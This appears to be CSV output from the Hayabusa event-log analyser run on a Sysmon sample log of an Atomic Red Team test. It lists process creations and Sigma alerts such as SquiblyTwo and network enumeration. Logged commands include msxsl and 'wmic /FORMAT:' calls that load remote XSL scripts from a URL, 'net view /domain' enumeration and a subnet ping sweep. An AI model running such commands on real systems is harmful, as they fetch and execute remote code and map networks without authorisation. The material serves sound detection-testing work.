2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:list : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view /domain : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.1 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.2 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.3 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.4 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.5 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.6 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.7 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.8 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.9 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.10 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.11 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.12 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.13 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.14 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.15 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.16 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.17 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.18 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.19 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.20 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.21 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.22 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.23 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.24 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.25 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.26 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.27 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.28 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.29 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.30 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.31 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.32 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.33 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.34 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.35 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.36 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.37 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.38 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
